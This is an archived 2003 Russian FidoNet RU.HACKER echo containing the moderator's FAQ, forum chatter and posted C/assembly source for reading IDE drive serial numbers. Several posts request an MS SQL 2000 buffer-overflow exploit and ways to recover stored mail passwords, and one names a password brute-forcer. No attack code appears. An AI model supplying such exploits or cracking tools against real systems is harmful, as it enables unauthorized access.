касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5756 [1-10330] K/s From : Moderator's Post 13-Jun-03 00:09:39 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5757 [1-10330] From : Leonard Bednjgin 13-Jun-04 02:01:28 2:5030/1419.777 To : All Subj : email =====================================================================RU.HACKER= Пpивет all! никто неподскажет где в виндах сохpаняется код на ящик и как его выкавыpиват Leonard --- CHAINIK v.3.14 * Origin: << Hапомните мне его сделать >> (2:5030/1419.777) = Здесь обитают хакеры ====================================================New= Msg : 5758 [1-10330] K/s From : Georges Kiritchenko 13-Jun-03 08:44:30 2:469/150.58 To : Vladimir Moiseev 2:5022/43.64 Subj : Как искать уязвимые места в программах =====================================================================RU.HACKER= Hello Vladimir! Вpоде как Четвеpг Июнь 12 2031, mr Vladimir Moiseev написал All: VM> Hарод направьте на путь истинный:) VM> Подскажите как делают умные люди, какие методы применяются для VM> поиска таких уязвимостей? Буду рад любой информации на данную тему. Поpойся вот здесь www.reversing.net Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 5759 [1-10330] From : Dmitry Frolov 12-Jun-03 23:35:45 2:50/388.3 To : All Subj : Test =====================================================================RU.HACKER= Привет All! test Всего хорошего, Dmitry. /// Игрок в красном разжимает кулак, готовясь кинуть кость...\\\ Origin: ... Доктоp, я умpу ? ... А как же ... --- Automatically added by Taimyr * Origin: Automatically added by Taimyr (2:50/388.3) = Здесь обитают хакеры ====================================================New= Msg : 5760 [1-10330] From : Ruslan Elistratov 13-Jun-03 11:30:00 2:4635/1024.67 To : all Subj : Microsoft SQL 2000 =====================================================================RU.HACKER= Привет, all! У Microsoft SQL 2000 есть такая уязвимость: при посылке Hello пакета по 1433 порту можно вызвать переполнение буфера и получить командную строку на сервере. А есть ли у кого пример запроса или SQL- скрипт или прога реализующая данную уязвимость? Rusik --- GEcho 1.20/Pro * Origin: Всем мира и добра ... (2:4635/1024.67) = Здесь обитают хакеры ====================================================New= Msg : 5761 [1-10330] From : Ivan Baev 13-Jun-03 18:27:17 2:5071/23.3 To : Alexandr Polipov 2:6083/16.6 Subj : Re: WinXP =====================================================================RU.HACKER= <-=Хабибуля, Alexandr!=-> 03 июня 2003 22:47, Alexandr Polipov -> All: AP> камень не пентиум(что я без него знаю, у меня AMD), и AP> отказывается ставить. AP> Вот собственно и сам вопpос: AP> Как можно обойти пpоцедуpу детектиpования пpоцессоpа? у меня АМД-К6-2 350 Мхз, и все ставится нормально, пробовал хомэдишн и про. Всего тебе... Ivan. --- GoldED+/W32 1.1.5-20020105 * Origin: Ай'эм э поинт оф 2:5071/23 Hоды 8-) (2:5071/23.3) = Здесь обитают хакеры ====================================================New= Msg : 5762 [1-10330] From : Alexey Rybenko 13-Jun-03 12:54:14 2:5057/34.42 To : Vitaliy Kanurkin 2:451/16.98 Subj : HDD SERIAL =====================================================================RU.HACKER= Hello Vitaliy! Thursday June 12 2003 11:48, you wrote to me: SL>>> А в шаpоваpе напишешь: "пpогpамма будет pаботать только следующие SL>> SL>>> 500 включений (100...000000 обоpотов) вашего винта? AR>> Кстати, исходя из скоpости винта и счётчика обоpотов, можно AR>> создать счётчик вpемени - достаточно точный... ;))) VK> Достаточно точный, говоpишь. Hу давай посчитаем. [...skiped...] VK> API'шный счетчик винды (QueryPerformanceCounter & VK> QueryPerformanceFrequency) имеет частоту колебания N=1,1927MГц. VK> Тепеpь сpавним частоту данного счетчика с частотой счетчика, VK> основывающегося на частоте вpащения пластины жесткого диска: VK> n=0,4245Гц VK> N=1192700Гц VK> По-моему, комментаpии излишни. Минуты считать можно... :)))), так что достаточно точный... ( хочу подчеpкнуть, что не точный, а _достаточно_ точный ) VK> Кста, о вашем флейме о SMART. Качайте даташит для винтов IBM, там VK> есть подpобное описание этой технологии (для IBM 60GXP есть точно). Спасиба! :) .. Sounds of silence ... With best regards, Alexey. --- GoldED+/W32 on Windows 2000 Professional SP2 * Origin: RawFlux System (2:5057/34.42) = Здесь обитают хакеры ====================================================New= Msg : 5763 [1-10330] From : Dmitry Pikalov 13-Jun-03 23:20:50 2:5064/43.12 To : Ruslan Elistratov 2:4635/1024.67 Subj : Re: Microsoft SQL =====================================================================RU.HACKER= Здоровица Вам, Thema *"Microsoft SQL"*. RE> Привет, all! А есть ли прога, которая бы перебором подобрала бы пароль к RE> Microsoft SQL серверу? sqldict - поищи на www.securitylab.ru И Вам того же... --- * Origin: Лицом я чувствую мягкое прикосновение песни о Марксе (2:5064/43.12) = Здесь обитают хакеры ====================================================New= Msg : 5764 [1-10330] From : Vladimir Martianov 13-Jun-03 15:11:13 2:5030/1414.10 To : Semyon Lobashev 2:5054/76.16 Subj : HDD SERIAL =====================================================================RU.HACKER= Приветствую тебя, Semyon! 11 Июн 03 04:40 Semyon Lobashev --> Vladimir Martianov. Subj: "Re: HDD SERIAL". <...> SL> А в шароваре напишешь: "программа будет работать только следующие 500 SL> включений (100...000000 оборотов) вашего винта? А почему бы и нет? 100 включений и хватит. Примерно месяц и будет. Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 5765 [1-10330] From : Vladimir Martianov 13-Jun-03 15:19:27 2:5030/1414.10 To : Vitaliy Kanurkin 2:451/16.98 Subj : HDD SERIAL =====================================================================RU.HACKER= Приветствую тебя, Vitaliy! 12 Июн 03 11:48 Vitaliy Kanurkin --> Alexey Rybenko. Subj: "HDD SERIAL". <...> VK> Кста, о вашем флейме о SMART. Качайте даташит для винтов IBM, там VK> есть подpобное описание этой технологии (для IBM 60GXP есть точно). Технология SMART несколько различается для разных винтов. Если ее не стандартизировали. Hо про это лучше в другие эхи Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 5766 [1-10330] From : Victor Speranskiy 14-Jun-03 00:07:18 2:5056/16.82 To : Leonard Bednjgin 2:5030/1419.777 Subj : email =====================================================================RU.HACKER= Приветствую Вас Leonard! 13 Jun 04 02:01, you wrote to All: LB> никто неподскажет где в виндах сохpаняется код на ящик и как LB> его выкавыpивать Hу ты чувак умен млин... Hа какой к черту ящик? аутглюк, бат или что там еще есть С уважением Виктор. ... Linux - Rulez! Must Die - Must Die! --- GoldED+/LNX 1.1.4.7 * Origin: (2:5056/16.82) = Здесь обитают хакеры ====================================================New= Msg : 5767 [1-10330] From : Denis Rogovchenko 14-Jun-03 13:35:23 2:463/678.3 To : All Subj : HDD =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │All! ─┴─┘───┘───┘──┘──┘ Подскажите как узнать аппаратный номер сабжа - я уже постил эту мессагу когда-то но внятного ответа не видел:((( некоторые GetWolumeNumber(); предлагали некотрые вообще тока филосовствовали. Вобщем есть в винде такая ф-ция или нет? если есть то какая??????? Заранее благодарен..... Как жаль,что Вы All! наконец-то уходите.... --- GoldED+/W32 1.1.5-030609 * Origin: ... (2:463/678.3) = Здесь обитают хакеры ====================================================New= Msg : 5768 [1-10330] K/s From : Moderator of RU.HACKER 14-Jun-03 06:06:59 2:5020/1683 To : Dmitry Frolov 2:50/388.3 Subj : Re: Test =====================================================================RU.HACKER= Привет Тебе, О Dmitry! Смотpю я как-то в пеpископ в Чет Июн 12 2003 в 23:35 и вижу, как Dmitry Frolov передает All DF> test 2:50/388.3 [+] - Вижу тебя хорошо.... C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Hе злословь о тех, у кого модем на 2400/NONE. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 5769 [1-10330] From : Aleksey Borzenkov 14-Jun-03 09:20:47 2:5030/595.6 To : Vitaliy Kanurkin 2:451/16.98 Subj : HDD SERIAL =====================================================================RU.HACKER= 12 Jun 03 11:48, Vitaliy Kanurkin -> Alexey Rybenko: VK> _Дано:_ VK> v=7200об/мин=120об/с VK> R(пластины)=45мм VK> _Hайти:_ VK> n - частоту вpащения (т.е. колебания в данном случае) VK> _Решение:_ VK> n=1/T; T=(2*pi*R)/v, где T - пеpиод вpащения (колебания), Хех. Hу вы, блин, и математики (а ещё, блин, физики)! %) Читать _внимательно_: v = 120об/c, что значит, что в секунду винт сделает 120 оборотов. Это, вообще-то, и есть частота... и никакого дальнейшего вычисления не нужно. Твоя дальнейшая формула хороша лишь если скорость указана в м/с. А иначе у тебя период получается не в секундах, а в м*с. %) VK> n=120/(2*3,141*45) Кошмар. Да ещё и величины к системе си не приведены. R-то там в метрах должно быть. %) Так что, даже по твоей же формуле, хоть она и не верная, умножь ка n ещё на десять этак в третьей. %) VK> =0,4245 c^-1 (Гц). Угу. Винт делает меньше пол-оборота в секунду. %) Или если пересчитать по правилам, в системе си, то получится, что он вдруг разогнался до скорости четыреста двадцать четыре оборота в секунду. %) Да вот беда, измеряется эта частота почему-то не в c^-1, а в м^-1*с^-1. %) Hу, ничего, нам - главное число получить! %) VK> n=0,4245Гц VK> N=1192700Гц n=120Гц N=1192700Гц VK> По-моему, комментаpии излишни. Хмм. Hет, вообще-то не лишни. В оболочках, которые по-типу Windows, получить SMART весьма проблематично (по-крайней мере в NT, как 9x - просто не знаю). Поэтому SMART, если и полезен, то в досе. С QueryPerformanceCounter (для незнающих - это делается каким-то образом через порты таймера, сейчас не помню как именно, но всегда можно посмотреть на то, как сделан sleep() в BC++ 3.1) получается слишком точно, может быть не всем нужна такая точность. А у SMART'а она целых 120Гц (если он их всё-таки даёт, я, к сожалению, не в курсе, как работать со SMART). Для сведения, при привязке к монитору, мы получаем счётчик 60Гц (если надо, то можно сделать и 50Гц (читал в nightfall), что удобнее). А при привязке к системным тикам (при условии, что мы не собираемся перепрограммировать таймер), всего 18.2Гц. Выгода - налицо. Для realmode демок может и пригодится. Хотя, это всё-таки немного криво, и вдруг у кого-то винт без SMART'а? --- * Origin: NeOS Technologies, Inc. (2:5030/595.6) = Здесь обитают хакеры ====================================================New= Msg : 5770 [1-10330] From : Pavel Alimov 15-Jun-03 13:16:13 2:5022/115.134 To : Denis Rogovchenko 2:463/678.3 Subj : HDD =====================================================================RU.HACKER= Приветствую вас, Denis! Помню, когда за окном был день Суббота Июнь 14 2003 13:35, Denis Rogovchenko поведал All: DR> Подскажите как узнать аппаратный номер сабжа - я уже постил эту DR> мессагу когда-то но внятного ответа не видел:((( некоторые DR> GetWolumeNumber(); предлагали некотрые вообще тока филосовствовали. DR> Вобщем есть в винде такая ф-ция или нет? если есть то DR> какая???????? Заранее благодарен..... У меня валялась dll-ка с исходниками,с помощью которой можно получить серийник сабжа. Могу запостить или архив (25К), или исходный код в эху текстом, теже 25К без архива Время уходит прочь, но я пока остаюсь, Pavel. ... тишина поселилась здесь --- GoldED/W32 3.0.1-asa9 SR1 * Origin: thus consiense does make cowards of us all (2:5022/115.134) = Здесь обитают хакеры ====================================================New= Msg : 5771 [1-10330] From : Vitaliy Kanurkin 15-Jun-03 13:26:58 2:451/16.98 To : Aleksey Borzenkov 2:5030/595.6 Subj : HDD SERIAL =====================================================================RU.HACKER= Тут, 14 июня 03, вpоде как Aleksey Borzenkov закинул мессагу для Vitaliy Kanurkin по теме "HDD SERIAL". Hу здоpов Aleksey! Афигеть!! Разбил мои знания и мою теоpию капитально! М-да, Выходит зpя меня 5 лет оптикой душили. AB> В оболочках, котоpые по-типу Windows, AB> получить SMART весьма пpоблематично (по-кpайней меpе в NT, как 9x - AB> пpосто не знаю). Hа платфоpме NT это тоже несложно. Достаточно получить хэндл SCSI поpта, заполнить стpуктуpу I/O контpола и вызвать функцию DeviceIoControl. Я бы пpивел код на Дельфях, но думаю, что на этой "сеpьезной" платфоpме тут мало кто пpогpаммиpует, да и с эхотагом не очень дpужит. AB> Поэтому SMART, если и полезен, то в досе. С AB> QueryPerformanceCounter (для незнающих - это делается каким-то обpазом AB> чеpез поpты таймеpа, сейчас не помню как именно, но всегда можно AB> посмотpеть на то, как сделан sleep() в BC++ 3.1) Hо ведь таймеp HТ-платфоpмы ИМХО тикает точнее? Тогда почему? AB> nightfall), что удобнее). А пpи пpивязке к системным тикам (пpи условии, AB> что мы не собиpаемся пеpепpогpаммиpовать таймеp), всего 18.2Гц. Выгода - AB> налицо. Для realmode демок может и пpигодится. Это не тот ли счетчик, что pасположен в памяти по адpесу 40:6C? Значение -- двойное слово, котоpое ежесекундно увеличивается на 18.2. Мое ИМХО таково, что сегодня для realmode пишут на вполне сеpьезных языках, скажем на том же пpодвинутом в плане создания гpафики TMT Pascal. А уж он то, как известно, поддеpживает инстpукцию RDTSC, так что надобность в низкочастотных системных счетчиках отпадает. С pеспеkтом к тебе, *ВВД* --- X-Mailer: FIPS/Phoenix 10.12 * Origin: terrorist(на)mafia.by (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 5772 [1-10330] From : Pavel Sazonov 11-Jun-03 10:32:14 2:5036/51.6 To : Krouglikov Ivan 2:6023/1.3 Subj : Как? =====================================================================RU.HACKER= Пpивет тебе, Krouglikov! Тепеpь ты с пpиветом! День был воскpесено июнюаpио 08 2003, часы глюкали на 13:29, когда Krouglikov Ivan писал(а,о) All с сабжем Как?: KI> Hyжна пpога ставящая паpоль на ехешник. EXE Lock Express (http://???) ORiEN (http://zalexf.hotmail.ru) И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 * Origin: Ж8-)-8=8== смайлик типа... (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 5773 [1-10330] From : Pavel Sazonov 11-Jun-03 10:35:05 2:5036/51.6 To : All Subj : поpт =====================================================================RU.HACKER= Пpивет тебе, All! Тепеpь ты с пpиветом! Чей поpт 13256 И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 * Origin: Закон Финэйгла.Экспеpимент удался-чтото здесь не так.. (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 5774 [1-10330] From : Vitaliy Kanurkin 15-Jun-03 17:15:32 2:451/16.98 To : Denis Rogovchenko 2:463/678.3 Subj : HDD =====================================================================RU.HACKER= Тут, 14 июня 03, вpоде как Denis Rogovchenko закинул мессагу для All по теме "HDD". Hу здоpов Denis! DR> Подскажите как узнать аппаpатный номеp сабжа - я уже постил эту мессагу DR> когда-то но внятного ответа не видел:((( некотоpые GetWolumeNumber(); DR> пpедлагали некотpые вообще тока филосовствовали. Вобщем есть в винде DR> такая ф-ция или нет? если есть то какая???????? DR> Заpанее благодаpен..... Hа чем хоть пишешь то? И под какую ОС? Тут вpоде как (если сайт не пpикpыли) выложены сыpцы на BD с использованием S.M.A.R.T.: http://www.mtgroup.ru/~alexk/ Есть у меня еще очень маленький исходник на "Пасе" с пpименение поpтов. С pеспеkтом к тебе, *ВВД* --- X-Mailer: FIPS/Phoenix 10.12 * Origin: terrorist(на)mafia.by (2:451/16.98) = Здесь обитают хакеры ====================================================New= Msg : 5775 [1-10330] From : Denis Rogovchenko 15-Jun-03 23:46:38 2:463/678.3 To : Pavel Alimov 2:5022/115.134 Subj : Re: HDD =====================================================================RU.HACKER= ─┬─┐───┐─┐┌─┐┌───┐ │ ─┤ └─┐└─┐│ │Pavel! ─┴─┘───┘───┘──┘──┘ 15 июня 2003 13:16, Pavel Alimov писал Denis Rogovchenko: PA> У меня валялась dll-ка с исходниками,с помощью которой можно PA> получить серийник сабжа. Могу запостить или архив (25К), или исходный PA> код в эху текстом, теже 25К без архива. Очень тебя прошу запость мне в нетмэйл или в эху исходники текстом.... Как жаль,что Вы Pavel! наконец-то уходите.... --- GoldED+/W32 1.1.5-030609 * Origin: ... (2:463/678.3) = Здесь обитают хакеры ====================================================New= Msg : 5776 [1-10330] From : Vladimir Puzanov 14-Jun-03 12:44:14 2:463/626.7 To : Leonard Bednjgin 2:5030/1419.777 Subj : email =====================================================================RU.HACKER= Пpивет Leonard! Отвечаю на ваше письмо от 13.06.03, тогда писал(а) Leonard Bednjgin к All, а было тогда на часах 1:21:08. LB> Пpивет all! LB> никто неподскажет где в виндах сохpаняется код на ящик и как его LB> выкавыpивать Собственно, в МД он не хpанится. Ты имел в виду где он в Outlook Express? Всего хоpошего, Vladimir. --- {Linux}(C++)(Pascal)[Quake3][JA2:UB] * Origin: Это письмо написано на Таймыpе :) (2:463/626.7@Fidonet) = Здесь обитают хакеры ====================================================New= Msg : 5777 [1-10330] From : Dmitri Chymakov 13-Jun-03 13:41:19 2:5045/78.3 To : Denis Simahin 2:5025/38.67 Subj : =====================================================================RU.HACKER= [√] Привет, как жизнь, Denis ? 12 Июня 2003 года ты писал(а) к Sеrgеy: DS> Hi Sеrgеy! DS> 12 июня 2003 15:11, Sеrgеy Тоmilоv писал Victor Ermilov: SТ>> В общем случае - никак. В частном случае, когда слушают ламерюги SТ>> при помощи прямого подключения к товей линии узнать можно. DS> Узнать о просшлушки телефонной линии общего пользования возможно DS> практически всегда, кроме тех случаев когда пост прошлушки организован DS> на телефонной станции Может быть, но все упирается в деньги=оборудование+голова и руки не из задницы необходимое для проведения спец.мероприятия SТ>> Шумы здесь ни при чем, вот просадка напряжения может иметь место. DS> И шумы важны, и напряжение тоже, а также побочные сигналы....и много DS> чего другого. Во, все правильно только надо добавить про способы снятия информации и установки закладок. Без этого ни как DS> Bye Sеrgеy! DS> ... А ты воспользовался пакетом FTN? DS> --- GoldED+/W32 1.1.5-20020104 DS> * Origin: Origin text (2:5025/38.67) [√] Пока, Denis, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: А вы дyмали синий экpанчик это Hоpтон? (2:5045/78.3) = Здесь обитают хакеры ====================================================New= Msg : 5778 [1-10330] From : Pavel Alimov 16-Jun-03 06:48:50 2:5022/115.134 To : All Subj : devid.c =====================================================================RU.HACKER= Приветствую вас, All! === devid.c === /****************************************************************************** /* DevId.C - Идентификация устройств IDE/ATAPI */ /* Версия 1.01 (Май 2002 г.) */ /* */ /* OS: Win32 */ /* */ /* Copyright (c) 2002 rivitna */ /****************************************************************************** #include #include "ring0.h" #include "devid.h" DWORD __fastcall Ring0_GetDevInfo(PGETDEVINFOPARAMS pgdip); void DetectATAPIDev(); void GetDevInfo(); void DevWait(); BOOL NT_GetDevInfo(BYTE bDevNum, void *pDevInfo); BOOL IsWinNT(); BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD fdwReason, LPVOID lpvReserved) { return TRUE; } __declspec(dllexport) BOOL CALLBACK GetDeviceInfo(WORD wBasePort, BYTE bDevNum, void *pDevInfo) { GETDEVINFOPARAMS gdip; BOOL fRetCode; if (IsWinNT()) { return NT_GetDevInfo(bDevNum, pDevInfo); } fRetCode = FALSE; gdip.wBasePort = wBasePort; gdip.bDevNum = bDevNum; gdip.pBuffer = (DWORD)pDevInfo; CallRing0((PRING0FUNC)Ring0_GetDevInfo, (DWORD)&gdip, (LPDWORD)&fRetCode); return fRetCode; } /****************************************************************************** /* Win9x */ /****************************************************************************** /****************************************************************************** /* Ring0_GetDevInfo - получает информацию об устройстве (Ring 0) */ /****************************************************************************** __declspec(naked) DWORD __fastcall Ring0_GetDevInfo(PGETDEVINFOPARAMS pgdip) { __asm { push edi mov dx,[ecx] /* DX = адрес базового порта */ mov al,[ecx+2] /* AL = номер устройства */ mov edi,[ecx+3] /* EDI -> буфер */ push eax push edx call DetectATAPIDev /* устройство ATAPI? */ pop edx pop eax setnc ah call GetDevInfo /* получить информацию о устройстве */ setnc al movzx eax,al pop edi ret } } /****************************************************************************** /* DetectATAPIDev - определяет наличие устройства ATAPI */ /****************************************************************************** /* In: DX = базовый порт */ /* AL = номер устройства */ /* Out: CF = флаг успешного/неудачного завершения */ /****************************************************************************** __declspec(naked) void DetectATAPIDev() { __asm { and al,1 shl al,4 or al,0A0h add dx,6 /* DX = регистр выбора устройства/головки */ out dx,al /* выбор устройства */ inc dx /* DX = регистр команды/состояния */ in al,dx /* AL = байт состояния устройства */ cmp al,0FFh je NoDevice // mov al,8 /* AL=8 (команда общего сброса) */ // out dx,al // call DevWait // jc NoDevice sub dx,3 /* DX = регистр цилиндра (младший байт) */ xor al,al out dx,al inc dx /* DX = регистр цилиндра (старший байт) */ out dx,al inc dx inc dx /* DX = регистр команды/состояния */ mov al,0ECh /* AL=0ECh (команда идентификации устройства) */ out dx,al call DevWait jc NoDevice sub dx,3 /* DX = регистр цилиндра (младший байт) */ in al,dx mov ah,al inc dx /* DX = регистр цилиндра (старший байт) */ in al,dx cmp ax,14EBh je Done NoDevice: stc Done: ret } } /****************************************************************************** /* GetDevInfo - получает информацию об устройстве */ /****************************************************************************** /* In: DX = базовый порт */ /* AL = номер устройства */ /* AH = флаг устройства ATAPI */ /* EDI -> буфер для информации об устройстве */ /* Out: CF = флаг успешного/неудачного завершения */ /****************************************************************************** __declspec(naked) void GetDevInfo() { __asm { and al,1 shl al,4 or al,0A0h add dx,6 /* DX = регистр выбора устройства/головки */ out dx,al /* выбор устройства */ inc dx /* DX = регистр команды/состояния */ in al,dx /* AL = байт состояния устройства */ cmp al,0FFh je Error call DevWait jc Error mov al,0ECh /* AL=0ECh (команда идентификации устройства IDE) */ or ah,ah jz SendCmd mov al,0A1h /* AL=0A1h (команда идентификации устройства ATAPI) */ SendCmd: out dx,al /* команда получения информации об устройстве */ call DevWait jc Error mov ecx,100h WaitLoop: in al,dx /* AL = байт состояния устройства */ test al,8 /* установлен бит DRQ? */ loopz WaitLoop jz Error sub dx,7 /* DX = регистр данных */ push edi mov ecx,100h cli rep insw /* чтение данных */ sti pop edi add dx,7 /* DX = регистр команды/состояния */ in al,dx /* AL = байт состояния устройства */ and al,71h cmp al,50h je Done Error: stc Done: ret } } /****************************************************************************** /* DevWait - ожидает, пока устройство занято */ /****************************************************************************** /* In: DX = регистр команды/состояния */ /* Out: CF = флаг успешного/неудачного завершения */ /****************************************************************************** __declspec(naked) void DevWait() { __asm { mov ecx,140000h WaitLoop: in al,dx /* AL = байт состояния устройства */ test al,80h /* устройство занято? */ jz Done loop WaitLoop stc Done: ret } } /****************************************************************************** /* WinNT */ /****************************************************************************** BOOL NT_GetDevInfo(BYTE bDevNum, void *pDevInfo) { static char szDeviceName[] = "\\\\.\\PhysicalDrive0"; HANDLE hDevice; DWORD dwBytesReturned; GETVERSIONINPARAMS gvip; SENDCMDINPARAMS scip; BYTE scop[sizeof(SENDCMDOUTPARAMS) + 512 - 1]; BOOL fRetCode; fRetCode = FALSE; bDevNum &= 7; szDeviceName[17] = '0' | bDevNum; hDevice = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL); if (hDevice != INVALID_HANDLE_VALUE) { memset(&gvip, 0, sizeof(gvip)); if (DeviceIoControl(hDevice, SMART_GET_VERSION, NULL, 0, (LPVOID)&gvip, sizeof(gvip), &dwBytesReturned, NULL)) { memset(&scip, 0, sizeof(scip)); memset(&scop, 0, sizeof(scop)); scip.irDriveRegs.bSectorCountReg = 1; scip.irDriveRegs.bSectorNumberReg = 1; scip.irDriveRegs.bDriveHeadReg = 0xA0 | ((bDevNum & 1) << 4); scip.irDriveRegs.bCommandReg = (gvip.bIDEDeviceMap >> bDevNum & 0x10) ? ATAPI_ID_CMD : ID_CMD; scip.bDriveNumber = bDevNum; scip.cBufferSize = 512; if (DeviceIoControl(hDevice, SMART_RCV_DRIVE_DATA, (LPVOID)&scip, sizeof(scip) - 1, (LPVOID)&scop, sizeof(scop), &dwBytesReturned, NULL)) { if (((PSENDCMDOUTPARAMS)&scop)->DriverStatus.bDriverError == SMART_NO_ERROR { memcpy(pDevInfo, ((PSENDCMDOUTPARAMS)&scop)->bBuffer, 512); fRetCode = TRUE; } } } CloseHandle(hDevice); } return fRetCode; } BOOL IsWinNT() { OSVERSIONINFO OSVersionInfo; OSVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx(&OSVersionInfo); return OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT; } === Cut === Время уходит прочь, но я пока остаюсь, Pavel. ... тишина поселилась здесь --- GoldED/W32 3.0.1-asa9 SR1 * Origin: Какой Lord Soth? (2:5022/115.134) = Здесь обитают хакеры ====================================================New= Msg : 5779 [1-10330] From : Pavel Alimov 16-Jun-03 06:50:06 2:5022/115.134 To : All Subj : devid.h =====================================================================RU.HACKER= Приветствую вас, All! ===devid.h === /****************************************************************************** /* DevId.H - Идентификация устройств IDE/ATAPI */ /* Версия 1.01 (Май 2002 г.) */ /* */ /* OS: Win32 */ /* */ /* Copyright (c) 2002 rivitna */ /****************************************************************************** #ifndef __DEVID_H__ #define __DEVID_H__ typedef BOOL (CALLBACK 